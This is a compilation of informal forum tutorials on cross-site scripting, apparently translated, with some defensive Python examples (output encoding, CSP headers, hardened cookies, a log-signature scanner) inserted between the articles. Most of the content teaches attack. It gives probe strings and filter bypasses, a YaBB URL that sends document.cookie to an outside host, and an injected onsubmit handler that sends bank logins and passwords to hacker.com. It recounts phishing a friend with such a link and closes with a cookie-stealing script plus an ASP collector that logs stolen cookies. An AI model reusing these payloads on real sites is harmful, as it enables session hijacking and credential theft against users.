Here are some articles about XSS that I collected; I hope they help you understand this topic a little better. First is the article by Mask_NBTA.
Basic XSS
How does the vulnerability occur?
This vulnerability occurs when a web application accepts dangerous data entered by a hacker. As you know, a website usually contains links; through these links the hacker can insert pieces of code, and any user who follows such a link is, 99% of the time, done for. Put simply, through this vulnerability the hacker can insert code into the site or into a link to steal important information from the victim. The important information here may be cookies or the username + password for some bank account, which is then sent to the hacker. The hacker's usual method is to encode the dangerous part of the link (the part with the injected code) as HEX (or in some other form) so that the victim is less suspicious when clicking the dangerous link. After that comes finding some way to get the victim to click the booby-trapped link; this depends on how cunning each hacker is :-), and the more cunning, the sooner the results come in.
Most web applications today use a cookie to tie a single account to a particular user, meaning each person uses their own cookie. Webmail, shopping sites, banks, ... mostly all use cookies for the purpose of authenticating the user, and this is exactly what the hacker is after.
So what the heck is this "inserting code", and what do you insert with: Javascript (most common), VBScript, ActiveX, HTML, or Flash.
You probably have a rough idea of this vulnerability by now :-). If not, keep reading and you will.
Now let's talk about this vulnerability in real detail:
First, a brief introduction to how some characters commonly used in XSS are encoded in the ADDRESS bar, so you won't be thrown off in a moment:
-------------------
Because the IBF forum does not support tables in posts, you can see the details in the write-up here: http://members.lycos.co.uk/masknbta/mask.rtf
-------------------- that's just the basics; if you want to know all of it, look it up yourselves.
TESTING FOR XSS
Now I will lay out the steps you can use to check whether a site is vulnerable to XSS:
Any site always has one or all of the following: search results, error messages, web forms; XSS mainly lives in these parts. In general, XSS can occur anywhere a user can enter data and then gets something back.
To find the vulnerability cleanly, security experts divide it into 7 steps, but in my opinion it should be 5 steps:
Step 1: Open the website to be tested (obviously).
Step 2: Start testing: locate a search box or a login form and submit some information (enter something and press submit, login, OK or whatever), for example enter the word "Mask_NBTA", or any other word.
Step 3: Determine whether the site is likely vulnerable to XSS by looking at what comes back:
For example, if you see something like this:
"Your search for 'Mask_NBTA' did not find any items"
"Your search for 'Mask_NBTA' returned the following results"
"User 'Mask_NBTA' is not valid"
"Invalid login 'Mask_NBTA'"
or anything else that involves the word "Mask_NBTA" you originally entered, then this one is 99% hit by XSS.
There is another form I'd like to present as well:
+ Watch the inputs or the variables right in the address bar (var=); when you see these, just stuff data in. Try these scripts:
<script>alert('Mask_NBTA')</script>
or <i*g csstest=javascript:alert('Mask_NBTA')>
or &{alert('Mask_NBTA')};
Step 4: Actually insert code into the vulnerable spot:
insert this <script>alert('Mask_NBTA')</script> into the field from before and press SUBMIT. If you then get a popup containing "Mask_NBTA", this one is 100% hit by XSS. But note: sometimes a website is hit by XSS but no popup appears; then you have no choice but to VIEW SOURCE. When viewing the source, remember to look for this line <script>alert('Mask_NBTA')</script>; if it is there, that's it, XSS right here.
Another, more common example:
Suppose http://sitebiloi.com/ is a site hit by XSS and we found the vulnerable spot like this: http://sitebiloi.com/index.php?page=<s...< script>, meaning we can insert code right in the ADDRESS bar.
I can't cover every situation; what you need is to understand the problem, and then you will understand when something is vulnerable.
EXPLOITATION
Having tested for the vulnerability, now we have to find a way to exploit it to get what we want:
I will present how to take the victim's cookie through XSS:
With this code, the browser will execute the code and then send all the cookies to you as a .txt file, and you just open that file and look.
But you can't always insert code easily; sometimes you have to be a bit flexible, because website programmers are not so stupid as to let us run wild like that. They have their own trick to stop us, which is "code filtering" (an Anti-XSS Filter). Their mechanism is as follows: the filter removes the special characters the user enters, that's all.
Does the hacker just give up? Not necessarily! The hacker also tries to get past the "filter" with a few tricks such as:
1/ If the "filter" removes the two characters "<" and ">":
The hacker uses "\x3c" and "\x3e" instead and begins inserting code with ') +
The string "%26%7balert%28%27Mask%27%29%7d%3b" is simply &{alert('Mask')}; encoded.
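To make the defender's side of this concrete, here is an added Python example (my own, not from the original post or the forum) that reflects a search term the way steps 3 and 4 describe, once behind the "remove < and >" filter from item 1/ above and once with proper HTML output encoding, and then applies the step-4 check (does the raw probe survive into the page source?) to the three probe strings given in the testing steps. The function names (render_vulnerable, render_with_filter, render_escaped, survives_filter, survives_escape, decode_probe) are my own.

```python
import html
from urllib.parse import unquote

# The three probe strings from the testing steps above (copied as constants).
PROBES = [
    "<script>alert('Mask_NBTA')</script>",
    "<img csstest=javascript:alert('Mask_NBTA')>",
    "&{alert('Mask_NBTA')};",
]


def render_vulnerable(term: str) -> str:
    """Echoes the search term verbatim into the page (the step-3 symptom)."""
    return f"<p>Your search for '{term}' did not find any items</p>"


def strip_angle_brackets(term: str) -> str:
    """The denylist filter described in item 1/: drops '<' and '>' only."""
    return term.replace("<", "").replace(">", "")


def render_with_filter(term: str) -> str:
    """Vulnerable renderer placed behind the denylist filter."""
    return render_vulnerable(strip_angle_brackets(term))


def render_escaped(term: str) -> str:
    """Context-aware output encoding: escape for an HTML text node.

    quote=True also encodes ' and " so the same routine is safe inside
    attribute values; '&' is encoded too, which neutralises the &{...} form.
    """
    return render_vulnerable(html.escape(term, quote=True))


def probe_reflected(page: str, probe: str) -> bool:
    """Step 4 as a mechanical check: does the raw probe appear in the source?"""
    return probe in page


def survives_filter(probe: str) -> bool:
    """True when the denylist filter lets the probe through unchanged."""
    return probe_reflected(render_with_filter(probe), probe)


def survives_escape(probe: str) -> bool:
    """True when output encoding still lets the probe reach the page raw."""
    return probe_reflected(render_escaped(probe), probe)


def decode_probe(encoded: str) -> str:
    """Undo the percent-encoding the article uses for the address bar."""
    return unquote(encoded)


if __name__ == "__main__":
    for probe in PROBES:
        print(f"{probe!r}: filter={survives_filter(probe)} "
              f"escape={survives_escape(probe)}")
    print(decode_probe("%26%7balert%28%27Mask%27%29%7d%3b"))
```

Run it and the denylist passes the third probe untouched, while the encoded rendering lets none of the three reach the page as markup: stripping a couple of characters is not the same as encoding for the output context.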
I'll give a few more examples so it's easier to picture:
* Forum YABB GOLD 1 SP1 (unpatched) is hit by XSS as follows:
ht*p://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269< script>location%3d'Ht*p://www.hostbanupfile.com/cookie.php?Cookie%3d'%2b(document.cookie)%3b< /script> , the weird-looking characters are now in use (look them up yourself)
we do this by abusing the img tag to insert code. When the admin reads this topic, his cookie flies straight into our hands. Heh heh!
How to use the cookie just stolen:
On WIN XP, cookies are stored at: C:\Documents and Settings\your name\cookies\
which cookie and exactly where, go look for yourself; otherwise, that much is enough to know.
Once found, replace our cookie with the one just stolen, then go back to the forum with this cookie and we are admin. But it seems that if we steal the cookie and the admin logs out, the cookie becomes useless; it only works while the admin has not logged out (I'm not sure I remember this correctly, but roughly it's probably right).
There are many, many more vulnerable sites + forums on the net; these are just a few examples to help you picture it.
How to lure the victim into exactly the link we want:
To make it practical and easy to understand, I'll tell you a story about hacking with XSS, which is also one more XSS scenario:
One day, bored, I was wandering the net and came to a website, say http://www.a.com/. Out of habit I typed some random data into the USERNAME field, and what I typed was Mask_NBTA. I immediately saw the text "Invalid login : user Mask_NBTA is not found in our data", heh heh, a symptom of XSS right there. Looking at the URL bar I saw this: http://www.a.com/login.asp?erro=Invalid%20...in%20our%20data
What could be better; the job now is how to hack it. First I saved this page to the hard disk, opened it with NOTEPAD and looked at the source. Why did I do that? Because I wanted to know the two variable names of the login form, and I found them easily: they are "ten" and "matkhau". Based on these two I knew what I had to do and how to insert the code, heh heh. What I wanted at this point was to use XSS to get the victim's username + password. So what to insert? After a moment's thought I decided to insert this:
Why insert a bunch of real variables as well? So that looking at the URL you don't see the injected code hanging off the end; mainly it makes the link long and convoluted, first to dazzle the victim, and second to give the link a natural, legitimate look.
At this point I suddenly remembered that I have a friend who is a member of this site, and since I had free time, I decided to mess with him. What I did was send him an email with this content:
"Heard the news yet! WEBSITE a.com is running a contest with a 1,000,000 prize, and it's right up your alley, and you still don't know to enter. Look at this link and you'll understand:"
H*tp://www.a.com/login.asp but underneath this link is http://www.a.com/login.asp?tnbin1=gi..au.value;%22%2E
Guess what happens. Of course he clicks the seemingly harmless link, then logs into the site as normal, never suspecting that his username + password have been ...........
My job was just to go to the host, open the log file and look at what's in it; secret ..........
That's the end of the story. I'm sure you understand my method; hopefully with your brilliant minds there will be better ways than the one I just presented.
HOW TO PREVENT XSS:
1/ First, for website admins:
+ Do not allow any HTML tag to be entered by users.
+ Filter all active script out of the HTML code.
2/ For users:
Caution above all; don't die of ignorance.
I wrote this article first of all to review the knowledge for myself, and second to explain clearly to you how harmful XSS is so you can guard against it.
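The two admin-side rules above are the right idea; the concrete form a practitioner would ship today is output encoding plus a Content-Security-Policy and hardened session-cookie flags. Here is an added Python example (my own, not from the original post) that builds the login response from the bank scenario with the error text encoded, a CSP that refuses inline event handlers and beacons to other hosts, and a session cookie that document.cookie cannot read. The names login_response, session_cookie, cookie_is_hardened and csp_forbids_inline_script are mine.

```python
import html
from http.cookies import SimpleCookie

# Content-Security-Policy that blocks the techniques in these articles:
# no inline script (an injected onsubmit= handler does not run), and images,
# scripts, fetches and form submissions may only target this origin, so a
# beacon to another host or a form re-targeted elsewhere is refused.
CSP = (
    "default-src 'self'; script-src 'self'; img-src 'self'; "
    "connect-src 'self'; form-action 'self'; frame-ancestors 'none'"
)


def render_error(err: str) -> str:
    """Encode the error text for an HTML text node before reflecting it."""
    return html.escape(err, quote=True)


def session_cookie(session_id: str) -> str:
    """Build a Set-Cookie value with the flags that blunt cookie theft."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True   # hidden from document.cookie
    jar["session"]["secure"] = True     # only sent over HTTPS
    jar["session"]["samesite"] = "Lax"  # not attached to cross-site POSTs
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


def login_response(err: str, session_id: str):
    """Return (status, headers, body) for the login page showing an error."""
    body = (
        '<form action="login.asp" method="post">\n'
        f'<p class="error">{render_error(err)}</p>\n'
        'Username: <input type="text" name="login"><br>\n'
        'Password: <input type="password" name="password"><br>\n'
        '<input type="submit" value="Login">\n'
        "</form>"
    )
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
        "X-Content-Type-Options": "nosniff",
        "Set-Cookie": session_cookie(session_id),
    }
    return 200, headers, body


def cookie_is_hardened(set_cookie: str) -> bool:
    """Check that a Set-Cookie header carries HttpOnly, Secure and SameSite."""
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie.split(";")[1:]}
    return {"httponly", "secure", "samesite"} <= attrs


def csp_forbids_inline_script(policy: str) -> bool:
    """True when the effective script-src exists and lacks 'unsafe-inline'."""
    directives = {}
    for directive in policy.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name:
            directives[name] = value
    script = directives.get("script-src", directives.get("default-src", ""))
    return bool(script) and "'unsafe-inline'" not in script


if __name__ == "__main__":
    status, headers, body = login_response(
        'Invalid Login: </form><form onsubmit="x">', "constructed-session-id")
    print(status)
    for name, value in headers.items():
        print(f"{name}: {value}")
    print()
    print(body)
```

With these headers the injected onsubmit handler from the bank example is never executed, the image beacon to a foreign host is blocked by img-src, and even a script that does run cannot read the session cookie.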
Cross-Site Scripting (author not remembered)
Introduction:
How many times have you received an email containing hyperlinks? Think about it: you receive a mail with a link to a site you're a member of, with a rather sweet invitation; you click the link without a second thought and log in with your user .... and just like that you may well have lost your password to a hacker. That's only one small example of cross-site scripting.
Cross-Site Scripting
Cross-Site Scripting, also called XSS, is a vulnerability that occurs when web applications accept dangerous data from hackers, such as a piece of javascript or VBscript.... It will only help you get the secret information of a web application, no more no less (and forget the idea that successfully exploiting this vulnerability takes only a few minutes).
XSS can affect sites that let users enter data, usually:
+ search tools
+ forms filled in by users
+ web message boards, guestbooks
A hacker who discovers an XSS vulnerability will try to use it to take cookies, create fake login pages to take other people's passwords, etc.
Now let's dig into XSS; first, identify a site with this vulnerability:
For example, if a site's search tool, after we enter a value (for example: XSS), returns what we just entered (i.e., prints XSS), it is very likely hit by XSS. Now view the source of that site; if we find "XSS" there, the site is surely vulnerable, heh heh.
To simulate an XSS attack, an online bank site was created (www.freebank.com). First the hacker starts looking for a page on this site where a value can be entered; in the example, the hacker finds that when a login fails, the username shows up in the URL bar as follows: http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20Badlogin (%20 is the space character)
Next, the hacker checks whether HTML and javascript can be injected into this page. Simply replace "Invalid%20Login:%20Badlogin" in the URL above with <script>alert('XSS')</script>; if we then get a pop-up window with the message XSS, we can fully exploit this site through XSS. He now has to build a URL that can capture sensitive information. To build a URL that can fool many people, the hacker has to open the source of the web page (specifically the banklogin.asp page here) to put something suitable into the URL: here the hacker adds the following code (depending on the specific case, other code can be substituted)
</form>
<form action="login.asp" method="post"
onsubmit="XSSimage= new Image; XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;">
When "injected" into the login page, it looks like this: (our code is in italics)
<table>
<tr>
<td bgcolor="#2E7AA3" Style="border:1px solid black " WIDTH ="258" HEIGHT="217">
<form action="login.asp" method="post">
<center>
</form>
<form action="login.asp" method="post"
onsubmit="XSSimage= new Image; XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;">
<br> Username :<br><input type ="text" name ="login" style="border: 1px solid black; spacing :0"><br>Password:<br>
............................
As we can see, the "injected" code consists of two main parts: one is </form> to close the original page's <form>, the other is
<form action="login.asp" method="post"
onsubmit="XSSimage= new Image; XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;">
Note that <form action="login.asp" method="post"> is no different from the original; however, we add onsubmit, which runs the javascript when the victim clicks submit. The victim's information is sent to the link above (www.hacker.com).
Having got the code, the hacker now has to put it into the URL: http://www.freebank.com/banklogin.asp?serviceName=FreebanlCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com&err=%3C%2Fform%3E%0D%0A%3Cform+action%3D%22login.asp%22+method%3D%22post%22%0D%0Aonsubmit%3D%22XSSimage%3D+new+Image%3B+XSSimage.src%3D%27http%3A%2F%2Fhacker.com%2F%27%2Bdocument.forms%281%29.login.value%2B%27%3A%27%2Bdocument.forms%281%29.password.value%3B%22%3E%0D%0A
It's easy to see that this URL differs from the URL we used to test XSS; that is simply so the URL is long, to reduce the victim's suspicion.
Okay, now we send this link to the victim; there are many ways to fool them. After that, just wait and check the log file at
www.hacker.com
The above is only a small example; with each person's creativity there will be a personal way to exploit it. You can not only get other people's usernames and passwords but also change product prices at a shopping site, add data, etc.
I hope this article helps newbies like me understand XSS a bit more. For those who don't yet know what XSS is, after reading this, read Mask_NBTA_83's article again. It will help a lot.
Whenever I find more articles about XSS I'll try to dig up one more, if nobody minds, heh heh.
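From the detection side, here is an added Python example (my own, not from the article above) that scans web-server access-log lines for the injection forms shown in these posts: a raw tag inside a query parameter, an onsubmit= handler, a javascript: URI, the &{...} form and the \x3c/\x3e escapes, after undoing the percent-encoding that the long URL above relies on. The log lines are constructed for the example, and the names scan_log, classify, fully_decode and SIGNATURES are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed access-log lines (Common Log Format). Two are ordinary
# requests; three carry the injection forms shown in these articles.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2003:13:55:36 +0700] "GET /banklogin.asp?err=Invalid%20Login%3A%20Badlogin HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2003:13:57:02 +0700] "GET /banklogin.asp?err=%3C%2Fform%3E%0D%0A%3Cform+action%3D%22login.asp%22+method%3D%22post%22+onsubmit%3D%22XSSimage%3D+new+Image%3B%22%3E HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2003:14:01:10 +0700] "GET /search.php?q=Mask_NBTA HTTP/1.1" 200 300
203.0.113.7 - - [10/Oct/2003:14:01:44 +0700] "GET /search.php?q=%26%7balert%28%27Mask%27%29%7d%3b HTTP/1.1" 200 300
203.0.113.8 - - [10/Oct/2003:14:05:21 +0700] "GET /search.php?q=%3Cimg+csstest%3Djavascript%3Aalert%28%27x%27%29%3E HTTP/1.1" 200 300
"""

# Signatures for the injection forms discussed above. Each is checked
# against the fully decoded parameter value, so percent-encoding or
# double-encoding in the URL does not hide it.
SIGNATURES = [
    ("html_tag", re.compile(r"<\s*/?\s*(script|form|img|iframe|svg|object)\b", re.I)),
    ("event_handler", re.compile(r"\bon(submit|load|error|click|mouseover|focus)\s*=", re.I)),
    ("js_uri", re.compile(r"javascript\s*:", re.I)),
    ("entity_script", re.compile(r"&\{")),
    ("hex_escape", re.compile(r"\\x3[ce]", re.I)),
    ("cookie_read", re.compile(r"document\.cookie", re.I)),
]

# ip, identd, user, [timestamp], "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so double-encoded payloads surface.

    unquote_plus also turns '+' into a space, matching form encoding.
    """
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> list:
    """Return the names of the signatures that match the decoded value."""
    decoded = fully_decode(value)
    return [name for name, pattern in SIGNATURES if pattern.search(decoded)]


def scan_log(log_text: str) -> list:
    """Parse each request line and flag query parameters with signatures."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand; skip it
        ip, timestamp, method, target = match.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append({"ip": ip, "time": timestamp, "method": method,
                                 "path": parts.path, "param": name, "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['path']} param={finding['param']} "
              f"-> {', '.join(finding['hits'])}")
```

Running it flags the err parameter of the second line (closing tag plus onsubmit handler), the &{...} probe and the img/javascript: probe, while the two ordinary requests pass. The same classify routine can be applied to the decoded request body of POSTs, where a reflected form field would show up instead of the query string.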
In the article above I went over XSS and how it is exploited; you surely remember the javascript a hacker would use to get the victim's cookie (there are quite a few, but I'll point out the following example):
<script>document.location.replace('http://hacker/payload?c=' + document.cookie)</script>
<%
' Opens xss.txt for appending (mode 8, create if missing) and writes the
' cookie value received in the query string
Set bien = CreateObject("Scripting.FileSystemObject")
Set taobien = bien.OpenTextFile(Server.MapPath("xss.txt"), 8, true)
taobien.WriteLine Request.QueryString("cookie")
taobien.Close
Set taobien = Nothing
Set bien = Nothing
%>